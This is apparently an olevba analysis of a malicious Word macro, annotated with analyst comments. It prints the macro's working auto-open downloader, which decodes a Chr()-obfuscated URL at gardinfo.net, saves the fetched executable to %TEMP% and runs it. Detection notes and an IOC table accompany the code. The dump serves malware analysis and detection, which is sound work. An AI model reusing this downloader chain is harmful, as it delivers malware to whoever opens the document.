dynamoo

Malicious Word macro

Aug 10th, 2015
  1. olevba 0.31 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OpX:MASIH--V malware.docm
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: malware.docm
  10. Type: OpenXML
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: word/vbaProject.bin - OLE stream: u'VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub autoopen()
      '' Auto-exec entry point: Word runs this when the document is opened
      '' (olevba flags it as AutoOpen below). Its only work is to call VEeve,
      '' which forwards to FBFILE_FORMAT_1 (Module3), the download-and-execute
      '' routine. The 8.2 argument is never read by VEeve; it only pads the call.
  17.  
  18. VEeve (8.2)
  19.  
  20. End Sub
  21.  
  22. Sub VEeve(FFFFF As Long)
      '' Indirection layer only: FFFFF is unused and the body is a single call
      '' to FBFILE_FORMAT_1 (Module3), which fetches and launches the payload.
  23. FBFILE_FORMAT_1
  24.  
  25. End Sub
  26.  
  27.  
  28.  
  29. -------------------------------------------------------------------------------
  30. VBA MACRO Module2.bas
  31. in file: word/vbaProject.bin - OLE stream: u'VBA/Module2'
  32. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  33.  
  34. '':::::
  35. Static Function _
  36.  hFBrelop2IRrelop _
  37.   (ByVal tk As _
  38.  Integer) As Integer
      '' Filler: appears to be lifted from the FreeBASIC compiler sources
      '' (token -> AST relational-operator mapping). FB_TK_*, AST_OP_* and dfd
      '' are not defined anywhere in this project, `op` is computed but never
      '' assigned to the return value, and nothing on the live path
      '' (autoopen -> VEeve -> FBFILE_FORMAT_1) references this function.
  39.  
  40.  Dim op As Integer
  41.  
  42.     Select Case tk
  43.     Case FB_TK_EQ
  44.      op = AST_OP_EQ
  45.     Case FB_TK_GT
  46.      op = AST_OP_GT
  47.     Case FB_TK_LT
  48.      op = AST_OP_LT
  49.     Case FB_TK_NE
  50.      op = AST_OP_NE
  51.     Case FB_TK_LE
  52.      op = AST_OP_LE
  53.     Case FB_TK_GE
  54.      op = AST_OP_GE
  55.  Case Else
  56.   dfd.errReport (FB_ERRMSG_EXPECTEDRELOP)
  57.   '' error recovery: fake an op
  58.  op = AST_OP_EQ
  59.     End Select
  60.  
  61.  
  62. End Function
  63.  
  64. Public Sub mp3_cbr_aktivate(pathIsAbsolute_4 As Object, pathIsAbsolute_3 As String)
      '' Drops the payload to disk. The caller (FBFILE_FORMAT_1) passes an
      '' ADODB.Stream that holds the downloaded response body and a path under
      '' %TEMP%; SaveToFile with option 2 (adSaveCreateOverWrite) writes it out,
      '' replacing any existing file. This is the "SaveToFile" hit in the olevba
      '' table. Detection: a Word process writing a .exe into %TEMP% via ADODB.
  65. pathIsAbsolute_4.savetofile pathIsAbsolute_3, 2
  66. End Sub
  67. '':::::
  68. Static Function _
  69.  hFileExists _
  70.   (ByVal filename As _
  71.  String) As Integer
      '' Filler: despite the name this never looks at `filename`; it takes a
      '' FreeFile number, closes it without ever opening anything, and returns
      '' the default 0. Not referenced by the live code path.
  72.     Dim f As Integer
  73.  
  74.     f = FreeFile
  75.  
  76.   Close #f
  77.  
  78. End Function
  79.  
  80. '':::::
  81. Static Sub _
  82.  hUcase _
  83.   (ByVal src As String _
  84.   , ByVal dst As _
  85.  String)
      '' Filler: a literal port of a C-style pointer-walking ASCII uppercase
      '' routine. In VBA `c = s` assigns the whole String to an Integer and
      '' would raise a type-mismatch error for any non-numeric src, and `dst`
      '' is ByVal so nothing is written back. Not referenced by the live code.
  86.  
  87.     Dim c As Integer
  88.     Dim s
  89.     Dim d
  90.  
  91.  s = src
  92.  d = dst
  93.  
  94.  Do
  95.   c = s
  96.   If (c >= 97) Then
  97.    If (c <= 122) Then
  98.     c = c - (97 - 65)
  99.    End If
  100.   ElseIf (c = 0) Then
  101.    Exit Do
  102.   End If
  103.  
  104.   d = c
  105.  
  106.   s = s + 1
  107.   d = d + 1
  108.  Loop
  109.  
  110.  '' null-term
  111. d = 0
  112.  
  113. End Sub
  114.  
  115. '':::::
  116. Static Sub _
  117.  hClearName _
  118.   (ByVal src As String)
       '' Filler: the CHAR_* constants are not defined anywhere in this project
       '' and `src` is ByVal, so even if it ran it could have no visible effect.
       '' Not referenced by the live code path.
  119.  
  120.     Dim p
  121.  
  122.  p = src
  123.  
  124.  Do
  125.   Select Case p
  126.   Case 0
  127.    Exit Do
  128.  
  129.   Case CHAR_AUPP To CHAR_ZUPP, CHAR_ALOW To CHAR_ZLOW, CHAR_0 To CHAR_9, CHAR_UNDER
  130.  
  131.   Case Else
  132.    p = CHAR_ZLOW
  133.   End Select
  134.  
  135.   p = p + 1
  136.  Loop
  137.  
  138. End Sub
  139.  
  140. Public Function usZ5pw3gU8(KJB As Long)
       '' Downloader stage. KJB is unused (the caller passes 223 as padding).
       '' The ProgID on the next statement is assembled from Chr() calls with
       '' '<', '=' and ';' mixed in; hCurDir_2 strips those before CreateObject,
       '' so the object created is Microsoft.XMLHTTP. This is what olevba
       '' reports as "VBA obfuscated strings" / "Chr".
  141.  
  142. Dim httpRequest: Set httpRequest = hCurDir_2(Chr(77) & Chr(105) & Chr(60) & "c" & Chr(114) & Chr(111) & Chr(61) & Chr(115) & Chr(111) & Chr(102) & "t" & Chr(59) & Chr(46) & Chr(88) & "M" & Chr(60) & Chr(76) & ";" & "H" & Chr(84) & "=" & Chr(84) & "P")
       '' Synchronous GET (third argument False) of the URL the olevba IOC table
       '' decodes as http://gardinfo.net/435rg4/3245rd2.exe.
  143. httpRequest.Open Chr(71) & Chr(69) & Chr(84), Chr(104) & Chr(116) & "t" & Chr(112) & Chr(58) & "/" & "/" & "g" & "a" & Chr(114) & Chr(100) & Chr(105) & Chr(110) & Chr(102) & Chr(111) & "." & Chr(110) & Chr(101) & Chr(116) & Chr(47) & Chr(52) & "3" & Chr(53) & Chr(114) & Chr(103) & Chr(52) & Chr(47) & Chr(51) & Chr(50) & Chr(52) & Chr(53) & Chr(114) & Chr(100) & Chr(50) & Chr(46) & "e" & Chr(120) & "e", False
  144. httpRequest.Send
       '' Returns the raw response bytes to FBFILE_FORMAT_1, which writes them
       '' into an ADODB.Stream and saves the file. The HTTP status is never
       '' checked, so an error page from the server would be dropped to disk
       '' just the same; a failed connection raises an untrapped runtime error.
  145. usZ5pw3gU8 = httpRequest.responseBody
  146. End Function
  147. '' Searches backwards for the last '.' while still behind '/' or '\'.
  148. Private Function hFindExtBegin(ByRef path As String) As Integer
       '' Filler lifted from FreeBASIC rather than VBA: `for i as integer`,
       '' `path[i]`, `return i` and `function = ...` are not VBA syntax, so this
       '' module could not be compiled from the source shown here. Because the
       '' live downloader usZ5pw3gU8 sits in the same module, it is worth
       '' confirming that the compiled p-code in word/vbaProject.bin matches this
       '' decompressed source before treating the listing as authoritative; a
       '' mismatch would mean the executed code differs from what is shown.
  149.  for i as integer = len( path )-1 to 0 step -1
  150.   select case( path[i] )
  151.   Case Asc(".")
  152.    return i
  153. #If DEFIND_FB_WIN32_ Or DEFIND_FB_DOS_ Then
  154. Case Asc("\"), Asc("/")
  155. #Else
  156.   Case Asc("/")
  157. #End If
  158.    Exit For
  159.   End Select
  160.  Next
  161.  function = len( path )
  162. End Function
  163.  
  164. Function hStripExt(ByRef path As String) As String
       '' Filler (FreeBASIC `function =` return form); wraps hFindExtBegin and
       '' is not referenced by the live code path.
  165.  function = left( path, hFindExtBegin( path ) )
  166. End Function
  167.  
  168. '':::::
  169. function hStripPath _
  170.  ( _
  171.   byval filename as zstring ptr _
  172.  ) as string static
       '' Filler in FreeBASIC syntax (`zstring ptr`, `dim as`, `*filename`):
       '' finds the last '\' or '/' and returns the part after it. Near-duplicate
       '' of hStripFilename in Module3, which returns the part before it.
       '' RSLASH is not defined in this project. Not referenced by live code.
  173.  
  174.     dim as integer lp, p_found, p(1 to 2)
  175.  
  176.  lp = 0
  177.  Do
  178.   p(1) = instr( lp+1, *filename, RSLASH )
  179.   p(2) = instr( lp+1, *filename, "/" )
  180.         If p(1) = 0 Or (p(2) > 0 And p(2) < p(1)) Then
  181.             p_found = p(2)
  182.         Else
  183.             p_found = p(1)
  184.         End If
  185.      If (p_found = 0) Then
  186.       Exit Do
  187.      End If
  188.      lp = p_found
  189.  Loop
  190.  
  191.  If (lp > 0) Then
  192.   function = mid( *filename, lp+1 )
  193.  Else
  194.   function = *filename
  195.  End If
  196.  
  197. End Function
  198. -------------------------------------------------------------------------------
  199. VBA MACRO Module1.bas
  200. in file: word/vbaProject.bin - OLE stream: u'VBA/Module1'
  201. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  202. Public Function hHexUInt _
  203.  ( _
  204.   ByVal value As uinteger _
  205.  ) As String
       '' Filler: FreeBASIC hex formatter (pointer arithmetic on a zstring
       '' buffer, `shr =`, `+=`). Module1 contains only this kind of padding;
       '' nothing on the live path references anything in it.
  206.  
  207.     static as zstring * 8 + 1 res
  208.     dim as zstring ptr p
  209.     dim as integer lgt, maxlen
  210.  
  211.  static as integer hexTB(0 to 15) = _
  212.  { _
  213.   asc( "0" ), asc( "1" ), asc( "2" ), asc( "3" ), _
  214.   asc( "4" ), asc( "5" ), asc( "6" ), asc( "7" ), _
  215.   asc( "8" ), asc( "9" ), asc( "A" ), asc( "B" ), _
  216.   asc( "C" ), asc( "D" ), asc( "E" ), asc( "F" ) _
  217.  }
  218.  
  219.  maxlen = 4
  220.  If (value > 65535) Then
  221.   maxlen = 8
  222.  End If
  223.  
  224.  p = @res + 8-1
  225.  lgt = 0
  226.  
  227.  Do
  228.   *p = hexTB( value and &h0000000F )
  229.  
  230.   lgt +=1
  231.   If (lgt = maxlen) Then
  232.    Exit Do
  233.   End If
  234.  
  235.   p -= 1
  236.   value shr = 4
  237.  Loop
  238.  
  239.  function = p
  240.  
  241. End Function
  242.  
  243. Function hFloatToHex _
  244.  ( _
  245.   ByVal value As Double, _
  246.   ByVal dtype As Integer _
  247.  ) As String
       '' Filler: FreeBASIC float-to-hex helper (`cptr`, `@value`, `ulongint`);
       '' typeGet and FB_DATATYPE_DOUBLE are not defined in this project.
       '' Not referenced by the live code path.
  248.  
  249.  '' Emit the raw bytes that make up the float
  250. '' x86 little-endian assumption
  251. If (typeGet(dtype) = FB_DATATYPE_DOUBLE) Then
  252.   function = "0x" + hex( *cptr( ulongint ptr, @value ), 16 )
  253.  Else
  254.   dim as single singlevalue = value
  255.   '' Using an intermediate uinteger to allow compiling with FB
  256.  '' versions before the overload resolution overhaul
  257.  function = "0x" + hex( cuint( *cptr( ulong ptr, @singlevalue ) ), 8 )
  258.  End If
  259. End Function
  260.  
  261. Function hFloatToHex_C99 _
  262.  ( _
  263.   ByVal value As Double _
  264.  ) As String
       '' Filler: FreeBASIC C99 hex-float formatter (bit extraction via `shr`,
       '' `1ull`, `@"+"` pointer literals). Not valid VBA and not referenced by
       '' the live code path.
  265.  
  266.  '' float hex format defined in C99 spec: e.g. 0x1.fp+3
  267.  
  268.  dim as ulongint n = *cptr( ulongint ptr, @value )
  269.  
  270.  dim as integer sign = n shr 63
  271.  dim as integer exp2 = (n shr 52) and (1u shl 11 - 1)
  272.  dim as ulongint mantissa = n and (1ull shl 52 - 1)
  273.  
  274.  dim as string ret
  275.  
  276.  If (Sign <> 0) Then
  277.   '' negative
  278.  ret = "-0x"
  279.  Else
  280.   '' positive
  281.  ret = "0x"
  282.  End If
  283.  
  284.  exp2 -= 1023
  285.  If (exp2 > -1023) Then
  286.   '' normalized
  287.  ret += "1." + hex( mantissa, 13 )
  288.   If Right(ret, 1) = "0" Then ret = RTrim(ret, "0")
  289.  Else
  290.   If mantissa = 0 Then
  291.    '' zero
  292.   ret += "0"
  293.    exp2 = 0
  294.   Else
  295.    '' denormed
  296.   exp2 += 1
  297.    ret += "0." + hex( mantissa, 13  )
  298.    If Right(ret, 1) = "0" Then ret = RTrim(ret, "0")
  299.   End If
  300.  End If
  301.  
  302.  ret += "p" & (*iif( exp2 >= 0, @"+", @"-" )) + str( abs( exp2 ) )
  303.  
  304.  return ret
  305.  
  306. End Function
  307.  
  308.  
  309. -------------------------------------------------------------------------------
  310. VBA MACRO Module3.bas
  311. in file: word/vbaProject.bin - OLE stream: u'VBA/Module3'
  312. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  313.  
  314. '':::::
  315. Function hStripFilename _
  316.  ( _
  317.   ByVal filename As String _
  318.  ) As String
       '' Filler: same scan as hStripPath (Module2) but returns the directory
       '' part up to and including the last separator, or "" if there is none.
       '' `*filename` and RSLASH are FreeBASIC leftovers. Not referenced by the
       '' live code path.
  319.  
  320.     dim as integer lp, p_found, p(1 to 2)
  321.  
  322.  lp = 0
  323.  Do
  324.   p(1) = instr( lp+1, *filename, RSLASH )
  325.   p(2) = instr( lp+1, *filename, "/" )
  326.         If p(1) = 0 Or (p(2) > 0 And p(2) < p(1)) Then
  327.             p_found = p(2)
  328.         Else
  329.             p_found = p(1)
  330.         End If
  331.      If (p_found = 0) Then
  332.       Exit Do
  333.      End If
  334.      lp = p_found
  335.  Loop
  336.  
  337.  If (lp > 0) Then
  338.   function = left( *filename, lp )
  339.  Else
  340.   function = ""
  341.  End If
  342.  
  343. End Function
  344.  
  345. '':::::
  346. function hGetFileExt _
  347.  ( _
  348.   byval fname as zstring ptr _
  349.  ) as string static
       '' Filler: FreeBASIC extension extractor (last '.' onward, lower-cased,
       '' "" when the dot belongs to a directory). Not valid VBA and not
       '' referenced by the live code path.
  350.  
  351.     dim as integer p, lp
  352.     dim as string res
  353.  
  354.  lp = 0
  355.  Do
  356.   p = instr( lp+1, *fname, "." )
  357.   If (p = 0) Then
  358.    Exit Do
  359.   End If
  360.   lp = p
  361.  Loop
  362.  
  363.     If (lp = 0) Then
  364.      function = ""
  365.     Else
  366.      res = lcase( mid( *fname, lp+1 ) )
  367.         If InStr(res, RSLASH) > 0 Or InStr(res, "/") > 0 Then
  368.             '' We had a folder with a "." inside ...
  369.            function = ""
  370.         ElseIf (Len(res) > 0) Then
  371.       '' . or .. dirs?
  372.      if( res[0] = asc( RSLASH ) or res[0] = asc( "/" ) ) then
  373.        function = ""
  374.       Else
  375.        function = res
  376.       End If
  377.         End If
  378.     End If
  379.  
  380. End Function
  381.  
  382. sub hReplaceSlash( byval s as zstring ptr, byval char as integer )
       '' Filler: FreeBASIC in-place slash replacement. Note the `sub` is closed
       '' by `End Function`, another sign this text was never compilable VBA.
       '' Not referenced by the live code path.
  383.  for i as integer = 0 to len( *s ) - 1
  384.   if( (s[i] = CHAR_RSLASH) or (s[i] = CHAR_SLASH) ) then
  385.    s [i] = Char
  386.   End If
  387.  Next
  388. End Function
  389.  
  390. Function pathStripDiv(ByRef path As String) As String
       '' Filler: FreeBASIC helper that drops one trailing path separator.
       '' Only hCurDir (also filler) calls it; not on the live code path.
  391.  dim as integer length = len( path )
  392.  If (length > 0) Then
  393.   length -= 1
  394.   select case( path[length] )
  395. #If defined__FB_WIN32__ Or defined__FB_DOS__ Then
  396.   Case Asc("/"), Asc("\")
  397. #Else
  398.   Case Asc("/")
  399. #End If
  400.    return left( path, length )
  401.   End Select
  402.  End If
  403.  function = path
  404. End Function
  405.  
  406. Public Function hCurDir_2(UIlhbjkhoiyH As String)
       '' De-obfuscating CreateObject wrapper used by every COM instantiation
       '' in this project. The ProgIDs are stored with '<' (Chr 60), '=' (Chr 61)
       '' and ';' (Chr 59) sprinkled through them; the three Replace calls strip
       '' those before CreateObject. Observed callers resolve to
       '' Microsoft.XMLHTTP, WScript.Shell, Adodb.Stream and Shell.Application.
       '' Detection note: the clean ProgID only exists at runtime, so static
       '' rules should key on this Replace/Chr-into-CreateObject pattern (as
       '' olevba does) or on the COM objects actually created, not on literal
       '' ProgID strings. Unrelated to hCurDir below despite the name.
  407. UIlhbjkhoiyH = Replace(UIlhbjkhoiyH, Chr(60), "")
  408. UIlhbjkhoiyH = Replace(UIlhbjkhoiyH, Chr(61), "")
  409. UIlhbjkhoiyH = Replace(UIlhbjkhoiyH, Chr(59), "")
  410.  Set hCurDir_2 = CreateObject(UIlhbjkhoiyH)
  411. End Function
  412. Function pathIsAbsolute(ByVal path As String) As Integer
       '' Filler: FreeBASIC absolute-path test with platform #If blocks. Not on
       '' the live code path; its name is reused as the prefix of the real
       '' variables in FBFILE_FORMAT_1 (pathIsAbsolute_1..4), presumably so the
       '' payload routine blends in with the padding.
  413. #If defined__FB_WIN32__ Or defined__FB_DOS__ Then
  414.  if( (*path)[0] <> 0 ) then
  415.   select case( (*path)[1] )
  416.   Case Asc(":")
  417.    '' C:...
  418.   function = TRUE
  419. #If def__FB_WIN32__ Then
  420.   Case Asc("\")
  421.    '' \\... UNC path
  422.   function = ((*path)[0] = asc( "\" ))
  423. #End If
  424.   End Select
  425.  End If
  426. #Else
  427.  '' /...
  428. function = ((*path)[0] = asc( "/" ))
  429. #End If
  430. End Function
  431.  
  432. Public Function FBFILE_FORMAT_1()
       '' Payload stage, reached via autoopen -> VEeve: download, drop to
       '' %TEMP%, execute. pathIsAbsolute_1, pathIsAbsolute_2 and
       '' noextensionFile are never declared, so they are implicit Variants.
       '' Next statement: ProgID decodes to WScript.Shell, and
       '' .Environment("Process") gives the process environment block.
  433. Set pathIsAbsolute_1 = hCurDir_2(Chr(87) & Chr(60) & Chr(83) & Chr(99) & Chr(61) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & ";" & Chr(46) & Chr(83) & Chr(61) & Chr(104) & Chr(101) & "<" & Chr(108) & Chr(108)).Environment(Chr(80) & Chr(114) & "o" & Chr(99) & Chr(101) & "s" & "s")
       '' Reads %TEMP%: the drop directory.
  434. pathIsAbsolute_2 = pathIsAbsolute_1("T" & Chr(69) & Chr(77) & Chr(80))
  435. Dim pathIsAbsolute_4 As Object
       '' ProgID decodes to Adodb.Stream; used as the binary buffer for the body.
  436. Set pathIsAbsolute_4 = hCurDir_2(Chr(65) & "<" & "d" & Chr(111) & Chr(59) & Chr(100) & Chr(98) & Chr(61) & Chr(46) & Chr(83) & Chr(116) & Chr(61) & Chr(114) & Chr(60) & Chr(101) & "a" & Chr(59) & Chr(109))
  437. Dim pathIsAbsolute_3 As String
       '' Drop path = %TEMP%\ceece.exe (the second executable name in the
       '' olevba IOC table). Mixed + and & concatenation is just more noise.
  438. pathIsAbsolute_3 = pathIsAbsolute_2 + "\ce" & Chr(101) + "ce." & "e" & Chr(120) & Chr(101)
  439. With pathIsAbsolute_4
       '' Type 1 = adTypeBinary; the stream is filled with the raw bytes that
       '' usZ5pw3gU8 (Module2) fetched. The 223 argument is ignored by it.
  440.    .Type = 1
  441.     .Open
  442.     .write usZ5pw3gU8(223)
  443.    
  444. End With
  445.  
       '' Save the stream to the drop path (mp3_cbr_aktivate, overwrite mode),
       '' then create Shell.Application and .Open the file, which launches it.
       '' No error handling anywhere, so any failure stops the macro with a
       '' visible runtime error. Detection: WINWORD.EXE issuing an outbound
       '' HTTP GET for a .exe, writing a PE into %TEMP%, then a new process
       '' started from that path.
  446.  mp3_cbr_aktivate pathIsAbsolute_4, pathIsAbsolute_3
  447. Set noextensionFile = hCurDir_2(Chr(83) & Chr(61) & "<" & "h" & "e" & Chr(108) & Chr(59) & Chr(108) & "<" & Chr(46) & Chr(65) & "p;" & Chr(112) & Chr(108) & Chr(105) & "<" & Chr(99) & Chr(97) & Chr(116) & Chr(61) & Chr(105) & Chr(111) & Chr(110))
  448. noextensionFile.Open (pathIsAbsolute_3)
  449. End Function
  450. Function hCheckFileFormat(ByVal f As Integer) As Integer
       '' Filler: FreeBASIC BOM sniffer. The FBFILE_FORMAT_* names used here are
       '' where the live payload routine FBFILE_FORMAT_1 borrowed its name from;
       '' this function itself is not referenced by the live code path.
  451.  dim as long BOM
  452.     dim as FBFILE_FORMAT fmt
  453.  
  454.  '' little-endian assumptions
  455. fmt = FBFILE_FORMAT_ASCII
  456.  
  457.  if( get( #f, 0, BOM ) = 0 ) then
  458.   If (BOM = &HFFFE0000) Then
  459.    fmt = FBFILE_FORMAT_UTF32BE
  460.  
  461.   ElseIf (BOM = &HFEFF) Then
  462.       fmt = FBFILE_FORMAT_UTF32LE
  463.  
  464.   Else
  465.    BOM and= &h00FFFFFF
  466.    If (BOM = &HBFBBEF) Then
  467.     fmt = FBFILE_FORMAT_UTF8
  468.  
  469.    Else
  470.     BOM and= &h0000FFFF
  471.           If (BOM = &HFEFF) Then
  472.            fmt = FBFILE_FORMAT_UTF16LE
  473.  
  474.           ElseIf (BOM = &HFFFE) Then
  475.            fmt = FBFILE_FORMAT_UTF16BE
  476.           End If
  477.    End If
  478.   End If
  479.  
  480.   Select Case fmt
  481.   Case FBFILE_FORMAT_ASCII
  482.    Seek #f, 1
  483.  
  484.   Case FBFILE_FORMAT_UTF8
  485.    Seek #f, 1 + 3
  486.  
  487.   Case FBFILE_FORMAT_UTF16LE, _
  488.     FBFILE_FORMAT_UTF16BE
  489.    Seek #f, 1 + 2
  490.   End Select
  491.  End If
  492.  
  493.  function = fmt
  494. End Function
  495.  
  496. Function hCurDir() As String
       '' Filler: returns curdir() without a trailing separator. Unrelated to
       '' hCurDir_2 (the CreateObject wrapper) despite the shared name; only
       '' pathStripCurdir, also filler, calls it.
  497.  '' curdir() usually won't be terminated with a path separator,
  498. '' except when it points to the file system root, instead of
  499. '' some directory (e.g. C:\ on Win32 or / on Unix).
  500. function = pathStripDiv( curdir( ) )
  501. End Function
  502.  
  503. Function pathStripCurdir(ByRef path As String) As String
       '' Filler: strips a leading current-directory prefix. FB_HOST_PATHDIV is
       '' not defined in this project; not referenced by the live code path.
  504.  var pwd = hCurDir() + FB_HOST_PATHDIV
  505.  If (Left(path, Len(pwd)) = pwd) Then
  506.   function = right( path, len( path ) - len( pwd ) )
  507.  Else
  508.   function = path
  509.  End If
  510. End Function
  511.  
  512. function hIsValidSymbolName( byval sym as zstring ptr ) as integer
       '' Filler: FreeBASIC identifier validator; hIsChar and hIsCharNumeric
       '' are not defined in this project. Not referenced by the live code path.
  513.  
  514.  If (sym = Null) Then Exit Function
  515.  
  516.  var symlen = len( *sym )
  517.  
  518.  If (symlen = 0) Then Exit Function
  519.  
  520.  if( (hIsChar(sym[0]) orelse (sym[0] = asc("_"))) = FALSE ) then exit function
  521.  
  522.  for i as integer = 1 to symlen-1
  523.   if( ((hIsChar(sym[i])) orelse (sym[i] = asc("_")) orelse (hIsCharNumeric(sym[i]))) = FALSE ) then exit function
  524.  Next
  525.  
  526.  function = TRUE
  527.  
  528. End Function
  529.  
  530. '' Checks whether a string starts with and ends in [double-]quotes.
  531. Private Function strIsQuoted(ByRef s As String) As Integer
       '' Filler (FreeBASIC `s[i]` indexing and `return`). Only strUnquote,
       '' also filler, calls it.
  532.  dim as integer last = len(s) - 1
  533.  If (Last < 1) Then
  534.   return FALSE
  535.  End If
  536.  
  537.  return (((s[0] = asc("""")) and (s[last] = asc(""""))) or _
  538.          ((s[0] = asc("'" )) and (s[last] = asc("'" ))))
  539. End Function
  540.  
  541. Function strUnquote(ByRef s As String) As String
       '' Filler: strips one pair of surrounding quotes. Not referenced by the
       '' live code path (autoopen -> VEeve -> FBFILE_FORMAT_1).
  542.  If (strIsQuoted(s)) Then
  543.   return mid(s, 2, len(s) - 2)
  544.  End If
  545.  return s
  546. End Function
  547.  
  548. +------------+----------------------+-----------------------------------------+
  549. | Type       | Keyword              | Description                             |
  550. +------------+----------------------+-----------------------------------------+
  551. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
  552. | Suspicious | Open                 | May open a file                         |
  553. | Suspicious | CreateObject         | May create an OLE object                |
  554. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  555. |            |                      | strings                                 |
  556. | Suspicious | SaveToFile           | May create a text file                  |
  557. | Suspicious | Write                | May write to a file (if combined with   |
  558. |            |                      | Open)                                   |
  559. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
  560. |            |                      | be used to obfuscate strings (option    |
  561. |            |                      | --decode to see all)                    |
  562. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  563. |            | Strings              | may be used to obfuscate strings        |
  564. |            |                      | (option --decode to see all)            |
  565. | IOC        | http://gardinfo.net/ | URL (obfuscation: VBA expression)       |
  566. |            | 435rg4/3245rd2.exe   |                                         |
  567. | IOC        | 3245rd2.exe          | Executable file name (obfuscation: VBA  |
  568. |            |                      | expression)                             |
  569. | IOC        | ceece.exe            | Executable file name (obfuscation: VBA  |
  570. |            |                      | expression)                             |
  571. +------------+----------------------+-----------------------------------------+